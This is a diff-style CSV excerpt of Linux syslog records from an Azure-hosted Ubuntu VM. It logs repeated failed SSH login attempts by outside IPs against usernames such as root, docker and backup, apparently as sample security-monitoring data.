+4832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:12,UbuntuDevEnv,2019-06-26 15:02:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,16469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:13,UbuntuDevEnv,2019-06-26 15:02:13,auth,UbuntuDevEnv,info,Failed password for invalid user filpx from 164.132.192.219 port 56828 ssh2,16469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filpx,164.132.192.2,56828,,
+4834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:14,UbuntuDevEnv,2019-06-26 15:02:13,auth,UbuntuDevEnv,info,Disconnected from invalid user filpx 164.132.192.219 port 56828 [preauth],16469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,filpx,164.132.192.2,56828,,
+4835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:14,UbuntuDevEnv,2019-06-26 15:02:13,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 56828:11: Bye Bye [preauth],16469,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,56828,,
+4836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:30,UbuntuDevEnv,2019-06-26 15:02:29,auth,UbuntuDevEnv,info,Invalid user pyramide from 47.254.147.170 port 35556,16538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pyramide,47.254.147.1,35556,,
+4837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:30,UbuntuDevEnv,2019-06-26 15:02:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,16538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:30,UbuntuDevEnv,2019-06-26 15:02:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:32,UbuntuDevEnv,2019-06-26 15:02:32,auth,UbuntuDevEnv,info,Failed password for invalid user pyramide from 47.254.147.170 port 35556 ssh2,16538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pyramide,47.254.147.1,35556,,
+4840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:32,UbuntuDevEnv,2019-06-26 15:02:32,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 35556:11: Bye Bye [preauth],16538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,35556,,
+4841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:32,UbuntuDevEnv,2019-06-26 15:02:32,auth,UbuntuDevEnv,info,Disconnected from invalid user pyramide 47.254.147.170 port 35556 [preauth],16538,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pyramide,47.254.147.1,35556,,
+4842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:39,UbuntuDevEnv,2019-06-26 15:02:38,auth,UbuntuDevEnv,info,Invalid user aaron from 220.134.138.111 port 45236,16567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,220.134.138.1,45236,,
+4843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:39,UbuntuDevEnv,2019-06-26 15:02:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:39,UbuntuDevEnv,2019-06-26 15:02:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,16567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:41,UbuntuDevEnv,2019-06-26 15:02:40,auth,UbuntuDevEnv,info,Failed password for invalid user aaron from 220.134.138.111 port 45236 ssh2,16567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,220.134.138.1,45236,,
+4846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:41,UbuntuDevEnv,2019-06-26 15:02:40,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 45236:11: Bye Bye [preauth],16567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,45236,,
+4847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:02:41,UbuntuDevEnv,2019-06-26 15:02:40,auth,UbuntuDevEnv,info,Disconnected from invalid user aaron 220.134.138.111 port 45236 [preauth],16567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,220.134.138.1,45236,,
+4848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:41,UbuntuDevEnv,2019-06-26 15:03:40,auth,UbuntuDevEnv,info,Invalid user docker from 164.132.192.219 port 37159,16784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,docker,164.132.192.2,37159,,
+4849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:41,UbuntuDevEnv,2019-06-26 15:03:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,16784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:41,UbuntuDevEnv,2019-06-26 15:03:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:42,UbuntuDevEnv,2019-06-26 15:03:42,auth,UbuntuDevEnv,info,Failed password for invalid user docker from 164.132.192.219 port 37159 ssh2,16784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,docker,164.132.192.2,37159,,
+4852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:43,UbuntuDevEnv,2019-06-26 15:03:42,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 37159:11: Bye Bye [preauth],16784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,37159,,
+4853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:43,UbuntuDevEnv,2019-06-26 15:03:42,auth,UbuntuDevEnv,info,Disconnected from invalid user docker 164.132.192.219 port 37159 [preauth],16784,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,docker,164.132.192.2,37159,,
+4854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:46,UbuntuDevEnv,2019-06-26 15:03:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.197.48  user=root,16808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,206.189.197.4,,0,
+4855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:48,UbuntuDevEnv,2019-06-26 15:03:48,auth,UbuntuDevEnv,info,Failed password for root from 206.189.197.48 port 52454 ssh2,16808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.197.4,52454,,
+4856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:49,UbuntuDevEnv,2019-06-26 15:03:48,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 206.189.197.48 port 52454 [preauth],16808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,206.189.197.4,52454,,
+4857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:49,UbuntuDevEnv,2019-06-26 15:03:48,auth,UbuntuDevEnv,info,"Received disconnect from 206.189.197.48 port 52454:11: Normal Shutdown, Thank you for playing [preauth]",16808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.197.4,52454,,
+4858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:56,UbuntuDevEnv,2019-06-26 15:03:55,auth,UbuntuDevEnv,info,Invalid user student9 from 47.254.147.170 port 52932,16843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student9,47.254.147.1,52932,,
+4859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:56,UbuntuDevEnv,2019-06-26 15:03:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,16843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:56,UbuntuDevEnv,2019-06-26 15:03:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:57,UbuntuDevEnv,2019-06-26 15:03:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40  user=sys,16842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sys,43.229.134.4,,0,
+4862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:57,UbuntuDevEnv,2019-06-26 15:03:57,auth,UbuntuDevEnv,info,Failed password for invalid user student9 from 47.254.147.170 port 52932 ssh2,16843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student9,47.254.147.1,52932,,
+4863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:58,UbuntuDevEnv,2019-06-26 15:03:57,auth,UbuntuDevEnv,info,Disconnected from invalid user student9 47.254.147.170 port 52932 [preauth],16843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student9,47.254.147.1,52932,,
+4864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:58,UbuntuDevEnv,2019-06-26 15:03:57,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 52932:11: Bye Bye [preauth],16843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,52932,,
+4865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:03:59,UbuntuDevEnv,2019-06-26 15:03:59,auth,UbuntuDevEnv,info,Failed password for sys from 43.229.134.40 port 44854 ssh2,16842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,44854,,
+4866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:00,UbuntuDevEnv,2019-06-26 15:03:59,auth,UbuntuDevEnv,info,Disconnected from authenticating user sys 43.229.134.40 port 44854 [preauth],16842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,sys,43.229.134.4,44854,,
+4867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:00,UbuntuDevEnv,2019-06-26 15:03:59,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 44854:11: Bye Bye [preauth],16842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,44854,,
+4868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:07,UbuntuDevEnv,2019-06-26 15:04:06,auth,UbuntuDevEnv,info,Invalid user dao from 192.241.213.168 port 35970,16885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,192.241.213.1,35970,,
+4869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:07,UbuntuDevEnv,2019-06-26 15:04:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:07,UbuntuDevEnv,2019-06-26 15:04:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,16885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+4871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:09,UbuntuDevEnv,2019-06-26 15:04:08,auth,UbuntuDevEnv,info,Failed password for invalid user dao from 192.241.213.168 port 35970 ssh2,16885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,192.241.213.1,35970,,
+4872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:09,UbuntuDevEnv,2019-06-26 15:04:08,auth,UbuntuDevEnv,info,Disconnected from invalid user dao 192.241.213.168 port 35970 [preauth],16885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,192.241.213.1,35970,,
+4873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:09,UbuntuDevEnv,2019-06-26 15:04:08,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 35970:11: Bye Bye [preauth],16885,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,35970,,
+4874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:29,UbuntuDevEnv,2019-06-26 15:04:28,auth,UbuntuDevEnv,info,Invalid user 10 from 220.134.138.111 port 34102,16964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,10,220.134.138.1,34102,,
+4875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:29,UbuntuDevEnv,2019-06-26 15:04:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:29,UbuntuDevEnv,2019-06-26 15:04:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,16964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:31,UbuntuDevEnv,2019-06-26 15:04:30,auth,UbuntuDevEnv,info,Failed password for invalid user 10 from 220.134.138.111 port 34102 ssh2,16964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,10,220.134.138.1,34102,,
+4878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:31,UbuntuDevEnv,2019-06-26 15:04:30,auth,UbuntuDevEnv,info,Disconnected from invalid user 10 220.134.138.111 port 34102 [preauth],16964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,10,220.134.138.1,34102,,
+4879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:04:31,UbuntuDevEnv,2019-06-26 15:04:30,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 34102:11: Bye Bye [preauth],16964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,34102,,
+4880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:10,UbuntuDevEnv,2019-06-26 15:05:10,auth,UbuntuDevEnv,info,Invalid user chi from 164.132.192.219 port 45718,17114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chi,164.132.192.2,45718,,
+4881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:10,UbuntuDevEnv,2019-06-26 15:05:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,17114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:10,UbuntuDevEnv,2019-06-26 15:05:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:12,UbuntuDevEnv,2019-06-26 15:05:12,auth,UbuntuDevEnv,info,Failed password for invalid user chi from 164.132.192.219 port 45718 ssh2,17114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chi,164.132.192.2,45718,,
+4884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:12,UbuntuDevEnv,2019-06-26 15:05:12,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 45718:11: Bye Bye [preauth],17114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,45718,,
+4885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:12,UbuntuDevEnv,2019-06-26 15:05:12,auth,UbuntuDevEnv,info,Disconnected from invalid user chi 164.132.192.219 port 45718 [preauth],17114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chi,164.132.192.2,45718,,
+4886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:27,UbuntuDevEnv,2019-06-26 15:05:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170  user=backup,17180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,47.254.147.1,,0,
+4887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:29,UbuntuDevEnv,2019-06-26 15:05:29,auth,UbuntuDevEnv,info,Failed password for backup from 47.254.147.170 port 41980 ssh2,17180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,41980,,
+4888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:29,UbuntuDevEnv,2019-06-26 15:05:29,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 41980:11: Bye Bye [preauth],17180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,41980,,
+4889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:05:29,UbuntuDevEnv,2019-06-26 15:05:29,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 47.254.147.170 port 41980 [preauth],17180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,47.254.147.1,41980,,
+4890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:18,UbuntuDevEnv,2019-06-26 15:06:17,auth,UbuntuDevEnv,info,Invalid user family from 220.134.138.111 port 51194,17350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,family,220.134.138.1,51194,,
+4891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:18,UbuntuDevEnv,2019-06-26 15:06:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
